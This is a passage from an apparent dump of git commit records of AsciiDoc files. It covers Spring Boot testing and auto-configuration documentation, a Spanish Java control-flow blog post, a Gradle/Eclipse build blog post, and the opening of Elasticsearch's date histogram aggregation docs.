the\n{sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-session]]\n== Spring Session\nSpring Session provides support for managing a user's session information. If you are\nwriting a web application and Spring Session and Spring Data Redis are both on the\nclasspath, Spring Boot will auto-configure Spring Session through its\n`@EnableRedisHttpSession`. Session data will be stored in Redis and the session timeout\ncan be configured using the `server.session-timeout` property.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n'`mbeanServer`' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the\n{sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module under\nthe `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` '`Starter POM`' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* JUnit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond '`unit testing`' and start '`integration testing`' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` '`Starter POM`' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebIntegrationTest` or `@WebAppConfiguration`\nannotations. (`MockMVC` and `@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@WebIntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(SampleDataJpaApplication.class)\n\t@WebIntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@WebIntegrationTest` as colon-\nor equals-separated name-value pairs, e.g. `@WebIntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(MyApplication.class)\n\t@WebIntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nNOTE: The annotations <<boot-features-testing-spring-boot-applications,described above>>\ncan be used with Spock, i.e. you can annotate your `Specification` with\n`@WebIntegrationTest` to suit the needs of your tests.\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is useful in\nintegration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response location),\nignoring cookies (so the template is stateless), and not throwing exceptions on\nserver-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Creating your own auto-configuration\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\nAuto-configuration can be associated to a \"starter\" that provides the auto-configuration\ncode as well as the typical libraries that you would use with it. We will first cover what\nyou need to know to build your own auto-configuration and we will move on to the\n<<boot-features-custom-starter,typical steps required to create a custom starter>>.\n\nTIP: A https:\/\/github.com\/snicoll-demos\/spring-boot-master-auto-configuration[demo project]\nis available to showcase how you can create a starter step by step.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only applies\nwhen relevant classes are found and when you have not declared your own `@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example, if\nyou provide web-specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Conditional` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to '`override`' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allows\nconfiguration to be included based on the presence or absence of specific classes. Due to\nthe fact that annotation metadata is parsed using http:\/\/asm.ow2.org\/[ASM] you can\nactually use the `value` attribute to refer to the real class, even though that class\nmight not actually appear on the running application classpath. You can also use the\n`name` attribute if you prefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow a bean\nto be included based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nConditions are evaluated after all configuration classes have been processed. This clearly\nmeans that you can't use it to make a whole configuration class conditional on the presence\n(or absence) of another bean. You can, however, use it when you have to share that\ncondition with all the beans of that configuration class.\n\n[NOTE]\n====\nYou also need to be very careful about ordering as the condition will be evaluated based on\nthe bean definitions that have been processed so far. Auto-configured `@Configuration` is\nalways parsed last (after any user defined beans) so it is recommended to restrict the use\nof that condition on auto-configuration classes only. However, if you are sure that the bean\ntargeted at the condition won't be created by auto-configuration, then you could use it on a\nnormal configuration class with appropriate ordering.\n====\n\n\n\n[[boot-features-property-conditions]]\n==== Property conditions\nThe `@ConditionalOnProperty` annotation allows configuration to be included based on a\nSpring Environment property. Use the `prefix` and `name` attributes to specify the\nproperty that should be checked. By default any property that exists and is not equal to\n`false` will be matched. You can also create more advanced checks using the `havingValue`\nand `matchIfMissing` attributes.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web application conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be included depending on whether the application is a 'web\napplication'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be included based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-custom-starter]]\n=== Creating your own starter\nA full Spring Boot starter for a library may contain the following components:\n\n* The `autoconfigure` module that contains the auto-configuration code.\n* The `starter` module that provides a dependency to the autoconfigure module as well as\n the library and any additional dependencies that are typically useful. In a nutshell,\n adding the starter should be enough to start using that library.\n\nTIP: You may combine the auto-configuration code and the dependency management in a single\nmodule if you don't need to separate those two concerns.\n\n\n\n[[boot-features-custom-starter-naming]]\n==== Naming\nPlease make sure to provide a proper namespace for your starter. Do not start your module\nnames with `spring-boot`, even if you are using a different Maven groupId. We may offer an\nofficial support for the thing you're auto-configuring in the future.\n\nHere is a rule of thumb. Let's assume that you are creating a starter for \"acme\", name the\nauto-configure module `acme-spring-boot-autoconfigure` and the starter\n`acme-spring-boot-starter`. If you only have one module combining the two, use\n`acme-spring-boot-starter`.\n\nBesides, if your starter provides configuration keys, use a proper namespace for them. In\nparticular, do not include your keys in the namespaces that Spring Boot uses (e.g.\n`server`, `management`, `spring`, etc). These are \"ours\" and we may improve\/modify them\nin the future in such a way it could break your things.\n\nMake sure to\n<<appendix-configuration-metadata#configuration-metadata-annotation-processor,trigger\nmeta-data generation>> so that IDE assistance is available for your keys as well. You\nmay want to review the generated meta-data (`META-INF\/spring-configuration-metadata.json`)\nto make sure your keys are properly documented.\n\n\n\n[[boot-features-custom-starter-module-autoconfigure]]\n==== Autoconfigure module\nThe autoconfigure module contains everything that is necessary to get started with the\nlibrary. It may also contain configuration keys definition (`@ConfigurationProperties`)\nand any callback interface that can be used to further customize how the components are\ninitialized.\n\nTIP: You should mark the dependencies to the library as optional so that you can include\nthe autoconfigure module in your projects more easily. If you do it that way, the library\nwon't be provided and Spring Boot will backoff by default.\n\n\n\n[[boot-features-custom-starter-module-starter]]\n==== Starter module\nThe starter is an empty jar, really. Its only purpose is to provide the necessary\ndependencies to work with the library; see it as an opinionated view of what is required\nto get started.\n\nDo not make assumptions about the project in which your starter is added. If the library\nyou are auto-configuring typically requires other starters, mention them as well. Providing\na proper set of _default_ dependencies may be hard if the number of optional dependencies\nis high as you should avoid bringing unnecessary dependencies for a typical usage of the\nlibrary.\n\n\n\n[[boot-features-websockets]]\n== WebSockets\nSpring Boot provides WebSockets auto-configuration for embedded Tomcat (8 and 7), Jetty 9\nand Undertow. If you're deploying a war file to a standalone container, Spring Boot\nassumes that the container will be responsible for the configuration of its WebSocket\nsupport.\n\nSpring Framework provides {spring-reference}\/#websocket[rich WebSocket support] that can\nbe easily accessed via the `spring-boot-starter-websocket` module.\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.aoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b454261da307f565432900e391ee6bc311a83183","subject":"Update 2015-05-07-Estructuras-de-Control-If-Else-While.adoc","message":"Update 2015-05-07-Estructuras-de-Control-If-Else-While.adoc","repos":"Wurser\/wurser.github.io,Wurser\/wurser.github.io,Wurser\/wurser.github.io","old_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_file":"_posts\/2015-05-07-Estructuras-de-Control-If-Else-While.adoc","new_contents":"= Estructuras de Control. If, Else, While.\n\n:hp-tags: Simplemente Java, Java\n\n== If\n\t\t\n\n\tif(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }\n \n \n== Else\n\n\n\t\n if(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else{\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n\n }\n \n \n== Else If\n\n\n\n if(#1_Condicion_Booleana){ \n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }\n \n \nTambien se puede poner un `*_else_*` al final \n \n if(#1_Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }else{\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple ninguna de las condiciones\n }\n \n \n\n== While\n\n\twhile(CONDICION_BOOLEANA){\n\t\t\/\/C\u00f3digo que se ejecurtar\u00e1 mientras se cumpla la condici\u00f3n\n\t}\n \n \nCAUTION: Si la condicion no se cumple, no entra en el bucle while ","old_contents":"= Estructuras de Control. If, Else, While.\n\n:hp-tags: Simplemente Java, Java\n\n== IF\n\t\t\n\n\tif(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }\n \n \n== ELSE\n\n\n\t\n if(Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else{\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n\n }\n \n \n== ELSE IF\n\n\n\n if(#1_Condicion_Booleana){ \n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }\n \n \nTambien se puede poner un `*_else_*` al final \n \n if(#1_Condicion_Booleana){ \n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si se cumple la condici\u00f3n\n }else if(#2_Condicion_Booleana){\n \t\/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple la condici\u00f3n #1 y si la condici\u00f3n #2\n }else{\n\t \/\/C\u00f3digo que se ejecurtar\u00e1 si NO se cumple ninguna de las condiciones\n }\n \n \n\n== WHILE\n\n\twhile(CONDICION_BOOLEANA){\n\t\t\/\/C\u00f3digo que se ejecurtar\u00e1 mientras se cumpla la condici\u00f3n\n\t}\n \n \nCAUTION: Si la condicion no se cumple, no entra en el bucle while ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4fa26de36d430057516fa6ca21cf85ab28c0df44","subject":"Update 2017-11-21-Building-op-appear-with-using-Gradle.adoc","message":"Update 2017-11-21-Building-op-appear-with-using-Gradle.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-21-Building-op-appear-with-using-Gradle.adoc","new_file":"_posts\/2017-11-21-Building-op-appear-with-using-Gradle.adoc","new_contents":"= Building op-app.ear with using Gradle\n\nMy newest assignment is to figure out how to build OpenPages using Gradle for the purpose of integrating added applications to it.\n\ntodo: make a graph of the applications we have today and show how the gradle build is going to work\n\n*Inception*\n\nWhen this suggested to me, I wasn't thrilled about it. But as I considered it closely, this is an opportunity to remove OpenPages from Eclipse once and for all. The problem here is that Eclipse is the tool we use to create the build artifacts, and as such is tightly intertwined with our build and release processes. Making any change to the project structure has implications that would create too much risk. \n\nBeing in Eclipse, there is no tooling that creates a visualization of the workspace's dependency structure, and so you are forced to investigate manually. Using Gradle or Maven, such visualizations are available, and these are much easier to follow and understand. And, best of all, these can be easily extended for purposes such as my current task.\n\nI started doing some of this manually. Here to the best of my recollection are the steps I've followed so far:\n\n- Created an IntelliJ Gradle project in ~\/projects\/ibm\/op-7.4-idea\n- Opened Eclipse to the current OpenPages 7.4 project that was already on my system\n- Now I found the rootmost project in the Eclipse workspace, which appears to be called *modelobjects*. \n- tbd\n\nThe idea is, look into an api that gives insight on an Eclipse workspace that can be read and translated into something else, in my case Gradle. The process of doing it manually is cumbersome, and the process will need to be repeated for every build, as projects are updated constantly. So the workflow will look like this:\n\n1) Gradle script uses RTC command line to pull the latest code\n2) Gradle script builds the application, perhaps with addons specified\n3) Out pops op-apps.ear\n\n- So, investigating an API to provide Eclipse introspection, and failing that or maybe instead of that, read the eclipse project files in code I've written based upon what I'm seeing in the OpenPages project in Eclipse.\n- Investigating RTC command line\n\n**Man, this might be easy**\n\nSo as I look at the .classpath of each project, its a simple XML structure. Here's an example for the project *aurora*:\n\n```<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classpath>\n\t<classpathentry kind=\"src\" path=\"com.ibm.openpages.aurora.service\"\/>\n\t<classpathentry kind=\"src\" path=\"com.ibm.openpages.webapp\"\/>\n\t<classpathentry kind=\"src\" path=\"com.openpages.aurora\"\/>\n\t<classpathentry kind=\"src\" path=\"com.ibm.openpages.sdk\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.libraries\"\/>\n\t<classpathentry exported=\"true\" kind=\"lib\" path=\"\/com.ibm.openpages.libraries\/op-apps.ear\/lib\/java-sdk-3.8.0-jar-with-dependencies.jar\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.modelobjects\"\/>\n\t<classpathentry kind=\"con\" path=\"org.eclipse.jdt.launching.JRE_CONTAINER\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.aurora.tools\"\/>\n\t<classpathentry kind=\"con\" path=\"org.eclipse.jst.j2ee.internal.module.container\"\/>\n\t<classpathentry combineaccessrules=\"false\" exported=\"true\" kind=\"src\" path=\"\/com.ibm.openpages.aurora.parsers\"\/>\n\t<classpathentry combineaccessrules=\"false\" kind=\"src\" path=\"\/com.ibm.openpages.reporting.webservice\"\/>\n\t<classpathentry kind=\"output\" path=\"bin\"\/>\n<\/classpath>\n```\n\n","old_contents":"= Building op-app.ear with using Gradle\n\nMy newest assignment is to figure out how to build OpenPages using Gradle for the purpose of integrating added applications to it.\n\ntodo: make a graph of the applications we have today and show how the gradle build is going to work\n\n*Inception*\n\nWhen this suggested to me, I wasn't thrilled about it. But as I considered it closely, this is an opportunity to remove OpenPages from Eclipse once and for all. The problem here is that Eclipse is the tool we use to create the build artifacts, and as such is tightly intertwined with our build and release processes. Making any change to the project structure has implications that would create too much risk. \n\nBeing in Eclipse, there is no tooling that creates a visualization of the workspace's dependency structure, and so you are forced to investigate manually. Using Gradle or Maven, such visualizations are available, and these are much easier to follow and understand. And, best of all, these can be easily extended for purposes such as my current task.\n\nI started doing some of this manually. Here to the best of my recollection are the steps I've followed so far:\n\n- Created an IntelliJ Gradle project in ~\/projects\/ibm\/op-7.4-idea\n- Opened Eclipse to the current OpenPages 7.4 project that was already on my system\n- Now I found the rootmost project in the Eclipse workspace, which appears to be called *modelobjects*. \n- tbd\n\nThe idea is, look into an api that gives insight on an Eclipse workspace that can be read and translated into something else, in my case Gradle. The process of doing it manually is cumbersome, and the process will need to be repeated for every build, as projects are updated constantly. So the workflow will look like this:\n\n1) Gradle script uses RTC command line to pull the latest code\n2) Gradle script builds the application, perhaps with addons specified\n3) Out pops op-apps.ear\n\n- So, investigating an API to provide Eclipse introspection, and failing that or maybe instead of that, read the eclipse project files in code I've written based upon what I'm seeing in the OpenPages project in Eclipse.\n- Investigating RTC command line\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"4029818c242bb5f42f14dde4985b44909a760da9","subject":"[Docs]\u00a0Correct formatting in datehistogram-aggregation.asciidoc (#56664)","message":"[Docs]\u00a0Correct formatting in datehistogram-aggregation.asciidoc (#56664)\n\n","repos":"nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/datehistogram-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-datehistogram-aggregation]]\n=== Date histogram aggregation\n\nThis multi-bucket aggregation is similar to the normal\n<<search-aggregations-bucket-histogram-aggregation,histogram>>, but it can\nonly be used with date or date range values. Because dates are represented internally in \nElasticsearch as long values, it is possible, but not as accurate, to use the\nnormal `histogram` on dates as well. The main difference in the two APIs is\nthat here the interval can be specified using date\/time expressions. Time-based\ndata requires special support because time-based intervals are not always a\nfixed length.\n\n[[calendar_and_fixed_intervals]]\n==== Calendar and fixed intervals\n\nWhen configuring a date histogram aggregation, the interval can be specified\nin two manners: calendar-aware time intervals, and fixed time intervals.\n\nCalendar-aware intervals understand that daylight savings changes the length\nof specific days, months have different amounts of days, and leap seconds can\nbe tacked onto a particular year.\n\nFixed intervals are, by contrast, always multiples of SI units and do not change\nbased on calendaring context.\n\n[NOTE]\n.Combined `interval` field is deprecated\n==================================\ndeprecated[7.2, `interval` field is deprecated] Historically both calendar and fixed\nintervals were configured in a single `interval` field, which led to confusing\nsemantics. Specifying `1d` would be assumed as a calendar-aware time,\nwhereas `2d` would be interpreted as fixed time. To get \"one day\" of fixed time,\nthe user would need to specify the next smaller unit (in this case, `24h`).\n\nThis combined behavior was often unknown to users, and even when knowledgeable about\nthe behavior it was difficult to use and confusing.\n\nThis behavior has been deprecated in favor of two new, explicit fields: `calendar_interval`\nand `fixed_interval`.\n\nBy forcing a choice between calendar and intervals up front, the semantics of the interval\nare clear to the user immediately and there is no ambiguity. The old `interval` field\nwill be removed in the future.\n==================================\n\n[[calendar_intervals]]\n===== Calendar intervals\n\nCalendar-aware intervals are configured with the `calendar_interval` parameter.\nCalendar intervals can only be specified in \"singular\" quantities of the unit\n(`1d`, `1M`, etc). Multiples, such as `2d`, are not supported and will throw an exception.\n\nThe accepted units for calendar intervals are:\n\nminute (`m`, `1m`) ::\nAll minutes begin at 00 seconds.\n\nOne minute is the interval between 00 seconds of the first minute and 00\nseconds of the following minute in the specified timezone, compensating for any\nintervening leap seconds, so that the number of minutes and seconds past the\nhour is the same at the start and end.\n\nhour (`h`, `1h`) ::\nAll hours begin at 00 minutes and 00 seconds.\n\nOne hour (1h) is the interval between 00:00 minutes of the first hour and 00:00\nminutes of the following hour in the specified timezone, compensating for any\nintervening leap seconds, so that the number of minutes and seconds past the hour\nis the same at the start and end.\n\n\nday (`d`, `1d`) ::\nAll days begin at the earliest possible time, which is usually 00:00:00\n(midnight).\n\nOne day (1d) is the interval between the start of the day and the start of\nof the following day in the specified timezone, compensating for any intervening\ntime changes.\n\nweek (`w`, `1w`) ::\n\nOne week is the interval between the start day_of_week:hour:minute:second\nand the same day of the week and time of the following week in the specified\ntimezone.\n\nmonth (`M`, `1M`) ::\n\nOne month is the interval between the start day of the month and time of\nday and the same day of the month and time of the following month in the specified\ntimezone, so that the day of the month and time of day are the same at the start\nand end.\n\nquarter (`q`, `1q`) ::\n\nOne quarter (1q) is the interval between the start day of the month and\ntime of day and the same day of the month and time of day three months later,\nso that the day of the month and time of day are the same at the start and end. +\n\nyear (`y`, `1y`) ::\n\nOne year (1y) is the interval between the start day of the month and time of\nday and the same day of the month and time of day the following year in the\nspecified timezone, so that the date and time are the same at the start and end. +\n\n[[calendar_interval_examples]]\n===== Calendar interval examples\nAs an example, here is an aggregation requesting bucket intervals of a month in calendar time:\n\n[source,console,id=datehistogram-aggregation-calendar-interval-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"month\"\n }\n }\n }\n}\n--------------------------------------------------\n\/\/ TEST[setup:sales]\n\nIf you attempt to use multiples of calendar units, the aggregation will fail because only\nsingular calendar units are supported:\n\n[source,console,id=datehistogram-aggregation-calendar-interval-multiples-example]\n--------------------------------------------------\nPOST \/sales\/_search?size=0\n{\n \"aggs\" : {\n \"sales_over_time\" : {\n \"date_histogram\" : {\n \"field\" : \"date\",\n \"calendar_interval\" : \"2d\"\n }\n }\n 